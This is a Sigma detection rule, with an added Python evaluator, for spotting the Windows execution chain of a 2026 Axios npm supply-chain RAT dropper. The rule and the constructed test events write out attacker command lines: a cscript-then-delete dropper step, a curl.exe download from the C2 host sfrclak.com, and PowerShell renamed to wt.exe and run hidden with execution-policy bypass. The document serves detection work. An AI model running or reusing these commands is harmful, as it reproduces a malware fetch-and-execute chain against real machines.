Axios NPM Compromise Indicators - Windows

Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection. The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.

Sigma rule

title: Axios NPM Compromise Indicators - Windows
id: f6c27ecc-d890-4452-80e6-2e274a10e097
status: experimental
description: |
    Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html?m=1
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.003
    - attack.t1059.005
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_cscript:
        ParentImage|endswith:
            - '\node.exe'
            - '\bun.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'cscript'
            - 'AppData\Local\Temp'
            - '//nologo && del'
            - '6202033.vbs'
    selection_curl:
        Image|endswith:
            - '\curl.exe'
            - '\powershell.exe'
        CommandLine|contains: 'http://sfrclak.com'
    selection_susp_cli:
        OriginalFileName: 'PowerShell.EXE'
        CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
    condition: 1 of selection_*
falsepositives:
    - Highly unlikely
level: high
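To show how the three selections above behave against real-looking telemetry, here is an added example (not part of the rule or of the Sigma project) that re-implements the rule's matching semantics in Python and runs it over constructed process-creation events. Sigma string modifiers are case-insensitive by default, so the evaluator lowercases both sides; the events, the example.com URL and the PAYLOAD_PATH_PLACEHOLDER / SCRIPT_PLACEHOLDER names are invented for the demonstration, while the indicators themselves are taken from the rule.

```python
# Added example: minimal evaluator for the rule's selections over constructed
# Windows process-creation events (field names follow the Sigma windows
# process_creation taxonomy: ParentImage, Image, CommandLine, OriginalFileName).

RULE = {
    "selection_cscript": {
        "ParentImage|endswith": ["\\node.exe", "\\bun.exe"],
        "Image|endswith": ["\\cmd.exe"],
        "CommandLine|contains|all": [
            "cscript", "AppData\\Local\\Temp", "//nologo && del", "6202033.vbs",
        ],
    },
    "selection_curl": {
        "Image|endswith": ["\\curl.exe", "\\powershell.exe"],
        "CommandLine|contains": ["http://sfrclak.com"],
    },
    "selection_susp_cli": {
        "OriginalFileName": ["PowerShell.EXE"],
        "CommandLine|contains": ['"C:\\ProgramData\\wt.exe" -w hidden -ep bypass -file'],
    },
}


def _field_matches(event, key, values):
    """Evaluate one 'Field|modifier...' entry; Sigma matching is case-insensitive."""
    field, *mods = key.split("|")
    actual = str(event.get(field, "")).lower()
    wanted = [v.lower() for v in values]
    if "endswith" in mods:
        results = [actual.endswith(v) for v in wanted]
    elif "contains" in mods:
        results = [v in actual for v in wanted]
    else:  # plain value: exact (case-insensitive) match
        results = [actual == v for v in wanted]
    # a list of values is OR-ed unless the 'all' modifier is present
    return all(results) if "all" in mods else any(results)


def matching_selections(event):
    """Names of selections the event satisfies; the rule fires on '1 of selection_*'."""
    return [name for name, fields in RULE.items()
            if all(_field_matches(event, k, v) for k, v in fields.items())]


def rule_matches(event):
    return bool(matching_selections(event))


# Constructed sample events (not real telemetry). Placeholders mark values the
# rule does not specify.
SAMPLE_EVENTS = [
    {   # node.exe -> cmd.exe running the dropped VBScript, then deleting it
        "ParentImage": "C:\\Program Files\\nodejs\\node.exe",
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c cscript C:\\Users\\dev\\AppData\\Local\\Temp\\6202033.vbs "
                       "//nologo && del C:\\Users\\dev\\AppData\\Local\\Temp\\6202033.vbs",
    },
    {   # curl.exe fetching from the C2 host named in the rule
        "ParentImage": "C:\\Windows\\System32\\cscript.exe",
        "Image": "C:\\Windows\\System32\\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -s -o C:\\ProgramData\\wt.exe "
                       "http://sfrclak.com/PAYLOAD_PATH_PLACEHOLDER",
    },
    {   # PowerShell binary renamed to wt.exe (Windows Terminal masquerade)
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\ProgramData\\wt.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": '"C:\\ProgramData\\wt.exe" -w hidden -ep bypass -file '
                       "C:\\ProgramData\\SCRIPT_PLACEHOLDER.ps1",
    },
    {   # benign: node spawning cmd for an ordinary npm script
        "ParentImage": "C:\\Program Files\\nodejs\\node.exe",
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /d /s /c npm run build",
    },
    {   # benign: curl to an unrelated host
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -s https://example.com/",
    },
]


def scan(events):
    """Return (event index, matched selections) for every event the rule fires on."""
    return [(i, matching_selections(e)) for i, e in enumerate(events) if rule_matches(e)]


if __name__ == "__main__":
    for idx, sels in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(sels)}")
```

Note that selection_susp_cli keys on OriginalFileName rather than Image: the renamed binary still carries PowerShell.EXE in its version resource, which is why a pure path-based check would miss the third event while this one catches it.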
